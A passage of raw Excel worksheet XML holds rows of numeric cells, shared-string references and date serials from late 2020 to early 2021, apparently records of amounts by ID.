      <c r="J3068" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3069" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3069">
        <v>23023</v>
      </c>
      <c r="B3069">
        <v>5004</v>
      </c>
      <c r="C3069" t="s">
        <v>16372</v>
      </c>
      <c r="D3069" t="s">
        <v>16475</v>
      </c>
      <c r="E3069">
        <v>17</v>
      </c>
      <c r="F3069" t="s">
        <v>12393</v>
      </c>
      <c r="G3069" s="1">
        <v>44182</v>
      </c>
      <c r="H3069">
        <v>36.76</v>
      </c>
      <c r="I3069" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3070" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3070">
        <v>23024</v>
      </c>
      <c r="B3070">
        <v>5004</v>
      </c>
      <c r="C3070" t="s">
        <v>16372</v>
      </c>
      <c r="D3070" t="s">
        <v>16475</v>
      </c>
      <c r="E3070">
        <v>17</v>
      </c>
      <c r="F3070" t="s">
        <v>12395</v>
      </c>
      <c r="G3070" s="1">
        <v>44182</v>
      </c>
      <c r="H3070" s="3" t="s">
        <v>16263</v>
      </c>
      <c r="I3070" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3071" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3071">
        <v>23025</v>
      </c>
      <c r="B3071">
        <v>5004</v>
      </c>
      <c r="C3071" t="s">
        <v>16372</v>
      </c>
      <c r="D3071" t="s">
        <v>16475</v>
      </c>
      <c r="E3071">
        <v>17</v>
      </c>
      <c r="F3071" t="s">
        <v>12396</v>
      </c>
      <c r="G3071" s="1">
        <v>44182</v>
      </c>
      <c r="H3071" s="3" t="s">
        <v>16264</v>
      </c>
      <c r="I3071" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3072" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3072">
        <v>23026</v>
      </c>
      <c r="B3072">
        <v>5004</v>
      </c>
      <c r="C3072" t="s">
        <v>16372</v>
      </c>
      <c r="D3072" t="s">
        <v>16475</v>
      </c>
      <c r="E3072">
        <v>17</v>
      </c>
      <c r="F3072" t="s">
        <v>12397</v>
      </c>
      <c r="G3072" s="1">
        <v>44182</v>
      </c>
      <c r="H3072" s="3" t="s">
        <v>16265</v>
      </c>
      <c r="I3072" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3073" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3073">
        <v>23027</v>
      </c>
      <c r="B3073">
        <v>5004</v>
      </c>
      <c r="C3073" t="s">
        <v>167</v>
      </c>
      <c r="D3073" t="s">
        <v>12392</v>
      </c>
      <c r="E3073">
        <v>17</v>
      </c>
      <c r="F3073" t="s">
        <v>9577</v>
      </c>
      <c r="G3073" s="1">
        <v>44182</v>
      </c>
      <c r="H3073">
        <v>0.48125000000000001</v>
      </c>
      <c r="I3073" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3074" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3074">
        <v>23028</v>
      </c>
      <c r="B3074">
        <v>5004</v>
      </c>
      <c r="C3074" t="s">
        <v>167</v>
      </c>
      <c r="D3074" t="s">
        <v>12392</v>
      </c>
      <c r="E3074">
        <v>17</v>
      </c>
      <c r="F3074" t="s">
        <v>9435</v>
      </c>
      <c r="G3074" s="1">
        <v>44182</v>
      </c>
      <c r="H3074">
        <v>295</v>
      </c>
      <c r="I3074" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3075" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3075">
        <v>23029</v>
      </c>
      <c r="B3075">
        <v>5004</v>
      </c>
      <c r="C3075" t="s">
        <v>167</v>
      </c>
      <c r="D3075" t="s">
        <v>12392</v>
      </c>
      <c r="E3075">
        <v>17</v>
      </c>
      <c r="F3075" t="s">
        <v>9928</v>
      </c>
      <c r="G3075" s="1">
        <v>44182</v>
      </c>
      <c r="H3075">
        <v>1405</v>
      </c>
      <c r="I3075" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3076" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3076">
        <v>23030</v>
      </c>
      <c r="B3076">
        <v>5004</v>
      </c>
      <c r="C3076" t="s">
        <v>167</v>
      </c>
      <c r="D3076" t="s">
        <v>12392</v>
      </c>
      <c r="E3076">
        <v>17</v>
      </c>
      <c r="F3076" t="s">
        <v>9595</v>
      </c>
      <c r="G3076" s="1">
        <v>44182</v>
      </c>
      <c r="H3076">
        <v>10</v>
      </c>
      <c r="I3076" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3077" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3077">
        <v>23031</v>
      </c>
      <c r="B3077">
        <v>5004</v>
      </c>
      <c r="C3077" t="s">
        <v>167</v>
      </c>
      <c r="D3077" t="s">
        <v>12392</v>
      </c>
      <c r="E3077">
        <v>17</v>
      </c>
      <c r="F3077" t="s">
        <v>10304</v>
      </c>
      <c r="G3077" s="1">
        <v>44182</v>
      </c>
      <c r="H3077">
        <v>10</v>
      </c>
      <c r="I3077" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3078" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3078">
        <v>23032</v>
      </c>
      <c r="B3078">
        <v>5004</v>
      </c>
      <c r="C3078" t="s">
        <v>16372</v>
      </c>
      <c r="D3078" t="s">
        <v>16475</v>
      </c>
      <c r="E3078">
        <v>17</v>
      </c>
      <c r="F3078" t="s">
        <v>9900</v>
      </c>
      <c r="G3078" s="1">
        <v>44182</v>
      </c>
      <c r="H3078">
        <v>45.76</v>
      </c>
      <c r="I3078" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3079" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3079">
        <v>23033</v>
      </c>
      <c r="B3079">
        <v>5004</v>
      </c>
      <c r="C3079" t="s">
        <v>16372</v>
      </c>
      <c r="D3079" t="s">
        <v>16475</v>
      </c>
      <c r="E3079">
        <v>17</v>
      </c>
      <c r="F3079" t="s">
        <v>11215</v>
      </c>
      <c r="G3079" s="1">
        <v>44182</v>
      </c>
      <c r="H3079" s="3" t="s">
        <v>16266</v>
      </c>
      <c r="I3079" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3080" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3080">
        <v>23034</v>
      </c>
      <c r="B3080">
        <v>5004</v>
      </c>
      <c r="C3080" t="s">
        <v>167</v>
      </c>
      <c r="D3080" t="s">
        <v>12392</v>
      </c>
      <c r="E3080">
        <v>17</v>
      </c>
      <c r="F3080" t="s">
        <v>9460</v>
      </c>
      <c r="G3080" s="1">
        <v>44182</v>
      </c>
      <c r="H3080">
        <v>285</v>
      </c>
      <c r="I3080" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3081" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3081">
        <v>23035</v>
      </c>
      <c r="B3081">
        <v>5004</v>
      </c>
      <c r="C3081" t="s">
        <v>16372</v>
      </c>
      <c r="D3081" t="s">
        <v>16475</v>
      </c>
      <c r="E3081">
        <v>17</v>
      </c>
      <c r="F3081" t="s">
        <v>9430</v>
      </c>
      <c r="G3081" s="1">
        <v>44182</v>
      </c>
      <c r="H3081" s="2" t="s">
        <v>16267</v>
      </c>
      <c r="I3081" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3082" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3082">
        <v>23036</v>
      </c>
      <c r="B3082">
        <v>5004</v>
      </c>
      <c r="C3082" t="s">
        <v>16372</v>
      </c>
      <c r="D3082" t="s">
        <v>16475</v>
      </c>
      <c r="E3082">
        <v>17</v>
      </c>
      <c r="F3082" t="s">
        <v>4686</v>
      </c>
      <c r="G3082" s="1">
        <v>44182</v>
      </c>
      <c r="H3082" s="3" t="s">
        <v>16268</v>
      </c>
      <c r="I3082" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3083" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3083">
        <v>23037</v>
      </c>
      <c r="B3083">
        <v>5004</v>
      </c>
      <c r="C3083" t="s">
        <v>16372</v>
      </c>
      <c r="D3083" t="s">
        <v>16475</v>
      </c>
      <c r="E3083">
        <v>17</v>
      </c>
      <c r="F3083" t="s">
        <v>2236</v>
      </c>
      <c r="G3083" s="1">
        <v>44182</v>
      </c>
      <c r="H3083" s="3" t="s">
        <v>16269</v>
      </c>
      <c r="I3083" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3084" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3084">
        <v>23038</v>
      </c>
      <c r="B3084">
        <v>5004</v>
      </c>
      <c r="C3084" t="s">
        <v>16372</v>
      </c>
      <c r="D3084" t="s">
        <v>16475</v>
      </c>
      <c r="E3084">
        <v>17</v>
      </c>
      <c r="F3084" t="s">
        <v>3814</v>
      </c>
      <c r="G3084" s="1">
        <v>44182</v>
      </c>
      <c r="H3084" s="3" t="s">
        <v>16270</v>
      </c>
      <c r="I3084" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3085" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3085">
        <v>23039</v>
      </c>
      <c r="B3085">
        <v>5004</v>
      </c>
      <c r="C3085" t="s">
        <v>167</v>
      </c>
      <c r="D3085" t="s">
        <v>12392</v>
      </c>
      <c r="E3085">
        <v>17</v>
      </c>
      <c r="F3085" t="s">
        <v>1746</v>
      </c>
      <c r="G3085" s="1">
        <v>44182</v>
      </c>
      <c r="H3085">
        <v>239</v>
      </c>
      <c r="I3085" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3086" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3086">
        <v>23040</v>
      </c>
      <c r="B3086">
        <v>5004</v>
      </c>
      <c r="C3086" t="s">
        <v>167</v>
      </c>
      <c r="D3086" t="s">
        <v>12392</v>
      </c>
      <c r="E3086">
        <v>17</v>
      </c>
      <c r="F3086" t="s">
        <v>7296</v>
      </c>
      <c r="G3086" s="1">
        <v>44182</v>
      </c>
      <c r="H3086">
        <v>60000</v>
      </c>
      <c r="I3086" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3087" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3087">
        <v>23041</v>
      </c>
      <c r="B3087">
        <v>5004</v>
      </c>
      <c r="C3087" t="s">
        <v>167</v>
      </c>
      <c r="D3087" t="s">
        <v>12392</v>
      </c>
      <c r="E3087">
        <v>17</v>
      </c>
      <c r="F3087" t="s">
        <v>9925</v>
      </c>
      <c r="G3087" s="1">
        <v>44182</v>
      </c>
      <c r="H3087">
        <v>30000</v>
      </c>
      <c r="I3087" t="s">
        <v>12394</v>
      </c>
    </row>
    <row r="3088" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3088">
        <v>23042</v>
      </c>
      <c r="B3088">
        <v>935</v>
      </c>
      <c r="C3088" t="s">
        <v>2886</v>
      </c>
      <c r="D3088" t="s">
        <v>12398</v>
      </c>
      <c r="E3088">
        <v>13</v>
      </c>
      <c r="F3088" t="s">
        <v>12399</v>
      </c>
      <c r="G3088" s="1">
        <v>44235</v>
      </c>
      <c r="H3088">
        <v>0</v>
      </c>
      <c r="I3088" t="s">
        <v>12400</v>
      </c>
    </row>
    <row r="3089" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3089">
        <v>23043</v>
      </c>
      <c r="B3089">
        <v>935</v>
      </c>
      <c r="C3089" t="s">
        <v>2886</v>
      </c>
      <c r="D3089" t="s">
        <v>12401</v>
      </c>
      <c r="E3089">
        <v>13</v>
      </c>
      <c r="F3089" t="s">
        <v>11035</v>
      </c>
      <c r="G3089" s="1">
        <v>44235</v>
      </c>
      <c r="H3089">
        <v>0</v>
      </c>
      <c r="I3089" t="s">
        <v>12400</v>
      </c>
    </row>
    <row r="3090" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3090">
        <v>23044</v>
      </c>
      <c r="B3090">
        <v>4954</v>
      </c>
      <c r="C3090" t="s">
        <v>7666</v>
      </c>
      <c r="D3090" t="s">
        <v>16476</v>
      </c>
      <c r="E3090">
        <v>7</v>
      </c>
      <c r="F3090" t="s">
        <v>12402</v>
      </c>
      <c r="G3090" s="1">
        <v>44151</v>
      </c>
      <c r="H3090" s="4">
        <v>100000</v>
      </c>
      <c r="J3090" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="3091" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3091">
        <v>23045</v>
      </c>
      <c r="B3091">
        <v>4954</v>
      </c>
      <c r="C3091" t="s">
        <v>7666</v>
      </c>
      <c r="D3091" t="s">
        <v>16476</v>
      </c>
      <c r="E3091">
        <v>7</v>
      </c>
      <c r="F3091" t="s">
        <v>3814</v>
      </c>
      <c r="G3091" s="1">
        <v>44151</v>
      </c>
      <c r="H3091" s="4">
        <v>100000</v>
      </c>
      <c r="J3091" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="3092" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3092">
        <v>23062</v>
      </c>
      <c r="B3092">
        <v>366</v>
      </c>
      <c r="C3092" t="s">
        <v>1934</v>
      </c>
      <c r="D3092" t="s">
        <v>11990</v>
      </c>
      <c r="E3092">
        <v>14</v>
      </c>
      <c r="F3092" t="s">
        <v>12403</v>
      </c>
      <c r="G3092" s="1">
        <v>44202</v>
      </c>
      <c r="H3092">
        <v>430918</v>
      </c>
      <c r="I3092" t="s">
        <v>12404</v>
      </c>
      <c r="J3092" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3093" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3093">
        <v>23063</v>
      </c>
      <c r="B3093">
        <v>5066</v>
      </c>
      <c r="C3093" t="s">
        <v>7942</v>
      </c>
      <c r="D3093" t="s">
        <v>12405</v>
      </c>
      <c r="E3093">
        <v>12</v>
      </c>
      <c r="F3093" t="s">
        <v>12406</v>
      </c>
      <c r="G3093" s="1">
        <v>44200</v>
      </c>
      <c r="H3093">
        <v>3000000</v>
      </c>
      <c r="J3093" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="3094" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3094">
        <v>23064</v>
      </c>
      <c r="B3094">
        <v>2795</v>
      </c>
      <c r="C3094" t="s">
        <v>7885</v>
      </c>
      <c r="D3094" t="s">
        <v>12407</v>
      </c>
      <c r="E3094">
        <v>16</v>
      </c>
      <c r="F3094" t="s">
        <v>6635</v>
      </c>
      <c r="G3094" s="1">
        <v>44223</v>
      </c>
      <c r="H3094">
        <v>1800000</v>
      </c>
      <c r="I3094" t="s">
        <v>9698</v>
      </c>
    </row>
    <row r="3095" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3095">
        <v>23065</v>
      </c>
      <c r="B3095">
        <v>5066</v>
      </c>
      <c r="C3095" t="s">
        <v>7942</v>
      </c>
      <c r="D3095" t="s">
        <v>12408</v>
      </c>
      <c r="E3095">
        <v>12</v>
      </c>
      <c r="F3095" t="s">
        <v>12409</v>
      </c>
      <c r="G3095" s="1">
        <v>44200</v>
      </c>
      <c r="H3095">
        <v>3000000</v>
      </c>
      <c r="I3095" t="s">
        <v>10031</v>
      </c>
      <c r="J3095" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="3096" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3096">
        <v>23066</v>
      </c>
      <c r="B3096">
        <v>5066</v>
      </c>
      <c r="C3096" t="s">
        <v>7942</v>
      </c>
      <c r="D3096" t="s">
        <v>12408</v>
      </c>
      <c r="E3096">
        <v>12</v>
      </c>
      <c r="F3096" t="s">
        <v>1746</v>
      </c>
      <c r="G3096" s="1">
        <v>44200</v>
      </c>
      <c r="H3096">
        <v>3000000</v>
      </c>
      <c r="I3096" t="s">
        <v>10031</v>
      </c>
      <c r="J3096" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="3097" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3097">
        <v>23067</v>
      </c>
      <c r="B3097">
        <v>5066</v>
      </c>
      <c r="C3097" t="s">
        <v>7942</v>
      </c>
      <c r="D3097" t="s">
        <v>12408</v>
      </c>
      <c r="E3097">
        <v>12</v>
      </c>
      <c r="F3097" t="s">
        <v>9437</v>
      </c>
      <c r="G3097" s="1">
        <v>44200</v>
      </c>
      <c r="H3097">
        <v>3000000</v>
      </c>
      <c r="I3097" t="s">
        <v>10031</v>
      </c>
      <c r="J3097" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="3098" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3098">
        <v>23068</v>
      </c>
      <c r="B3098">
        <v>4923</v>
      </c>
      <c r="C3098" t="s">
        <v>7963</v>
      </c>
      <c r="D3098" t="s">
        <v>12410</v>
      </c>
      <c r="E3098">
        <v>33</v>
      </c>
      <c r="F3098" t="s">
        <v>9458</v>
      </c>
      <c r="G3098" s="1">
        <v>44147</v>
      </c>
      <c r="H3098">
        <v>1000</v>
      </c>
      <c r="I3098" t="s">
        <v>12411</v>
      </c>
      <c r="J3098" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="3099" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3099">
        <v>23069</v>
      </c>
      <c r="B3099">
        <v>4923</v>
      </c>
      <c r="C3099" t="s">
        <v>7963</v>
      </c>
      <c r="D3099" t="s">
        <v>12410</v>
      </c>
      <c r="E3099">
        <v>33</v>
      </c>
      <c r="F3099" t="s">
        <v>547</v>
      </c>
      <c r="G3099" s="1">
        <v>44147</v>
      </c>
      <c r="H3099">
        <v>1000</v>
      </c>
      <c r="I3099" t="s">
        <v>12411</v>
      </c>
      <c r="J3099" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="3100" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3100">
        <v>23070</v>
      </c>
      <c r="B3100">
        <v>4923</v>
      </c>
      <c r="C3100" t="s">
        <v>7963</v>
      </c>
      <c r="D3100" t="s">
        <v>12410</v>
      </c>
      <c r="E3100">
        <v>33</v>
      </c>
      <c r="F3100" t="s">
        <v>7564</v>
      </c>
      <c r="G3100" s="1">
        <v>44147</v>
      </c>
      <c r="H3100">
        <v>1000</v>
      </c>
      <c r="I3100" t="s">
        <v>12411</v>
      </c>
      <c r="J3100" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="3101" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3101">
        <v>23071</v>
      </c>
      <c r="B3101">
        <v>4923</v>
      </c>
      <c r="C3101" t="s">
        <v>7963</v>
      </c>
      <c r="D3101" t="s">
        <v>12410</v>
      </c>
      <c r="E3101">
        <v>33</v>
      </c>
      <c r="F3101" t="s">
        <v>9838</v>
      </c>
      <c r="G3101" s="1">
        <v>44147</v>
      </c>
      <c r="H3101">
        <v>1000</v>
      </c>
      <c r="I3101" t="s">
        <v>12411</v>
      </c>
      <c r="J3101" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="3102" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3102">
        <v>23072</v>
      </c>
      <c r="B3102">
        <v>2746</v>
      </c>
      <c r="C3102" t="s">
        <v>7917</v>
      </c>
      <c r="D3102" t="s">
        <v>12412</v>
      </c>
      <c r="E3102">
        <v>4</v>
      </c>
      <c r="F3102" t="s">
        <v>12413</v>
      </c>
      <c r="G3102" s="1">
        <v>44187</v>
      </c>
      <c r="H3102">
        <v>10000</v>
      </c>
      <c r="J3102" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3103" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3103">
        <v>23073</v>
      </c>
      <c r="B3103">
        <v>2746</v>
      </c>
      <c r="C3103" t="s">
        <v>7917</v>
      </c>
      <c r="D3103" t="s">
        <v>12412</v>
      </c>
      <c r="E3103">
        <v>4</v>
      </c>
      <c r="F3103" t="s">
        <v>12414</v>
      </c>
      <c r="G3103" s="1">
        <v>44187</v>
      </c>
      <c r="H3103">
        <v>12000</v>
      </c>
      <c r="J3103" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3104" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3104">
        <v>23074</v>
      </c>
      <c r="B3104">
        <v>2746</v>
      </c>
      <c r="C3104" t="s">
        <v>7917</v>
      </c>
      <c r="D3104" t="s">
        <v>12412</v>
      </c>
      <c r="E3104">
        <v>4</v>
      </c>
      <c r="F3104" t="s">
        <v>3814</v>
      </c>
      <c r="G3104" s="1">
        <v>44187</v>
      </c>
      <c r="H3104">
        <v>14000</v>
      </c>
      <c r="J3104" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3105" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3105">
        <v>23075</v>
      </c>
      <c r="B3105">
        <v>1459</v>
      </c>
      <c r="C3105" t="s">
        <v>3826</v>
      </c>
      <c r="D3105" t="s">
        <v>12415</v>
      </c>
      <c r="E3105">
        <v>4</v>
      </c>
      <c r="F3105" t="s">
        <v>12413</v>
      </c>
      <c r="G3105" s="1">
        <v>44182</v>
      </c>
      <c r="H3105">
        <v>55000</v>
      </c>
      <c r="J3105" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3106" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3106">
        <v>23076</v>
      </c>
      <c r="B3106">
        <v>1459</v>
      </c>
      <c r="C3106" t="s">
        <v>3826</v>
      </c>
      <c r="D3106" t="s">
        <v>12415</v>
      </c>
      <c r="E3106">
        <v>4</v>
      </c>
      <c r="F3106" t="s">
        <v>12416</v>
      </c>
      <c r="G3106" s="1">
        <v>44182</v>
      </c>
      <c r="H3106">
        <v>60000</v>
      </c>
      <c r="J3106" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3107" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3107">
        <v>23077</v>
      </c>
      <c r="B3107">
        <v>1459</v>
      </c>
      <c r="C3107" t="s">
        <v>3826</v>
      </c>
      <c r="D3107" t="s">
        <v>12415</v>
      </c>
      <c r="E3107">
        <v>4</v>
      </c>
      <c r="F3107" t="s">
        <v>3814</v>
      </c>
      <c r="G3107" s="1">
        <v>44182</v>
      </c>
      <c r="H3107">
        <v>4000</v>
      </c>
      <c r="J3107" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3108" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3108">
        <v>23081</v>
      </c>
      <c r="B3108">
        <v>5030</v>
      </c>
      <c r="C3108" t="s">
        <v>7796</v>
      </c>
      <c r="D3108" t="s">
        <v>12417</v>
      </c>
      <c r="E3108">
        <v>26</v>
      </c>
      <c r="F3108" t="s">
        <v>1746</v>
      </c>
      <c r="G3108" s="1">
        <v>44258</v>
      </c>
      <c r="H3108">
        <v>120000</v>
      </c>
      <c r="I3108" t="s">
        <v>9536</v>
      </c>
      <c r="J3108" t="s">
        <v>9986</v>
      </c>
    </row>
    <row r="3109" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3109">
        <v>23082</v>
      </c>
      <c r="B3109">
        <v>5030</v>
      </c>
      <c r="C3109" t="s">
        <v>7796</v>
      </c>
      <c r="D3109" t="s">
        <v>12417</v>
      </c>
      <c r="E3109">
        <v>26</v>
      </c>
      <c r="F3109" t="s">
        <v>3814</v>
      </c>
      <c r="G3109" s="1">
        <v>44258</v>
      </c>
      <c r="H3109">
        <v>120000</v>
      </c>
      <c r="J3109" t="s">
        <v>9986</v>
      </c>
    </row>
    <row r="3110" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3110">
        <v>23083</v>
      </c>
      <c r="B3110">
        <v>5030</v>
      </c>
      <c r="C3110" t="s">
        <v>7796</v>
      </c>
      <c r="D3110" t="s">
        <v>12417</v>
      </c>
      <c r="E3110">
        <v>26</v>
      </c>
      <c r="F3110" t="s">
        <v>2236</v>
      </c>
      <c r="G3110" s="1">
        <v>44258</v>
      </c>
      <c r="H3110">
        <v>120000</v>
      </c>
      <c r="J3110" t="s">
        <v>9986</v>
      </c>
    </row>
    <row r="3111" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3111">
        <v>23084</v>
      </c>
      <c r="B3111">
        <v>5030</v>
      </c>
      <c r="C3111" t="s">
        <v>7796</v>
      </c>
      <c r="D3111" t="s">
        <v>12417</v>
      </c>
      <c r="E3111">
        <v>26</v>
      </c>
      <c r="F3111" t="s">
        <v>4686</v>
      </c>
      <c r="G3111" s="1">
        <v>44258</v>
      </c>
      <c r="H3111">
        <v>120000</v>
      </c>
      <c r="J3111" t="s">
        <v>9986</v>
      </c>
    </row>
    <row r="3112" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3112">
        <v>23085</v>
      </c>
      <c r="B3112">
        <v>5030</v>
      </c>
      <c r="C3112" t="s">
        <v>7796</v>
      </c>
      <c r="D3112" t="s">
        <v>12417</v>
      </c>
      <c r="E3112">
        <v>26</v>
      </c>
      <c r="F3112" t="s">
        <v>12418</v>
      </c>
      <c r="G3112" s="1">
        <v>44258</v>
      </c>
      <c r="H3112">
        <v>120000</v>
      </c>
      <c r="J3112" t="s">
        <v>9986</v>
      </c>
    </row>
    <row r="3113" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3113">
        <v>23086</v>
      </c>
      <c r="B3113">
        <v>5030</v>
      </c>
      <c r="C3113" t="s">
        <v>7796</v>
      </c>
      <c r="D3113" t="s">
        <v>12417</v>
      </c>
      <c r="E3113">
        <v>26</v>
      </c>
      <c r="F3113" t="s">
        <v>12419</v>
      </c>
      <c r="G3113" s="1">
        <v>44258</v>
      </c>
      <c r="H3113">
        <v>120000</v>
      </c>
      <c r="J3113" t="s">
        <v>9986</v>
      </c>
    </row>
    <row r="3114" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3114">
        <v>23090</v>
      </c>
      <c r="B3114">
        <v>1764</v>
      </c>
      <c r="C3114" t="s">
        <v>5918</v>
      </c>
      <c r="D3114" t="s">
        <v>10772</v>
      </c>
      <c r="E3114">
        <v>5</v>
      </c>
      <c r="F3114" t="s">
        <v>2236</v>
      </c>
      <c r="G3114" s="1">
        <v>44148</v>
      </c>
      <c r="H3114">
        <v>300000</v>
      </c>
      <c r="J3114" t="s">
        <v>12420</v>
      </c>
    </row>
    <row r="3115" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3115">
        <v>23091</v>
      </c>
      <c r="B3115">
        <v>768</v>
      </c>
      <c r="C3115" t="s">
        <v>16319</v>
      </c>
      <c r="D3115" t="s">
        <v>16320</v>
      </c>
      <c r="E3115">
        <v>16</v>
      </c>
      <c r="F3115" t="s">
        <v>7241</v>
      </c>
      <c r="G3115" s="1">
        <v>44204</v>
      </c>
      <c r="H3115" s="4">
        <v>325000</v>
      </c>
    </row>
    <row r="3116" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3116">
        <v>23092</v>
      </c>
      <c r="B3116">
        <v>768</v>
      </c>
      <c r="C3116" t="s">
        <v>16319</v>
      </c>
      <c r="D3116" t="s">
        <v>16320</v>
      </c>
      <c r="E3116">
        <v>16</v>
      </c>
      <c r="F3116" t="s">
        <v>9437</v>
      </c>
      <c r="G3116" s="1">
        <v>44204</v>
      </c>
      <c r="H3116" s="4">
        <v>200000</v>
      </c>
      <c r="J3116" t="s">
        <v>12421</v>
      </c>
    </row>
    <row r="3117" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3117">
        <v>23093</v>
      </c>
      <c r="B3117">
        <v>768</v>
      </c>
      <c r="C3117" t="s">
        <v>16319</v>
      </c>
      <c r="D3117" t="s">
        <v>16320</v>
      </c>
      <c r="E3117">
        <v>16</v>
      </c>
      <c r="F3117" t="s">
        <v>9435</v>
      </c>
      <c r="G3117" s="1">
        <v>44204</v>
      </c>
      <c r="H3117" s="4">
        <v>125000</v>
      </c>
      <c r="J3117" t="s">
        <v>11093</v>
      </c>
    </row>
    <row r="3118" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3118">
        <v>23095</v>
      </c>
      <c r="B3118">
        <v>2054</v>
      </c>
      <c r="C3118" t="s">
        <v>5675</v>
      </c>
      <c r="D3118" t="s">
        <v>10493</v>
      </c>
      <c r="E3118">
        <v>18</v>
      </c>
      <c r="F3118" t="s">
        <v>12422</v>
      </c>
      <c r="G3118" s="1">
        <v>44200</v>
      </c>
      <c r="H3118">
        <v>100</v>
      </c>
      <c r="I3118" t="s">
        <v>10494</v>
      </c>
      <c r="J3118" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3119" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3119">
        <v>23096</v>
      </c>
      <c r="B3119">
        <v>2715</v>
      </c>
      <c r="C3119" t="s">
        <v>6944</v>
      </c>
      <c r="D3119" t="s">
        <v>11323</v>
      </c>
      <c r="E3119">
        <v>18</v>
      </c>
      <c r="F3119" t="s">
        <v>12423</v>
      </c>
      <c r="G3119" s="1">
        <v>44188</v>
      </c>
      <c r="H3119">
        <v>100</v>
      </c>
      <c r="I3119" t="s">
        <v>11324</v>
      </c>
      <c r="J3119" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="3120" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3120">
        <v>23097</v>
      </c>
      <c r="B3120">
        <v>2715</v>
      </c>
      <c r="C3120" t="s">
        <v>6944</v>
      </c>
      <c r="D3120" t="s">
        <v>11323</v>
      </c>
      <c r="E3120">
        <v>18</v>
      </c>
      <c r="F3120" t="s">
        <v>609</v>
      </c>
      <c r="G3120" s="1">
        <v>44188</v>
      </c>
      <c r="H3120">
        <v>100</v>
      </c>
      <c r="I3120" t="s">
        <v>11324</v>
      </c>
      <c r="J3120" t="s">
        <v>9949</v>
      </c>
    </row>
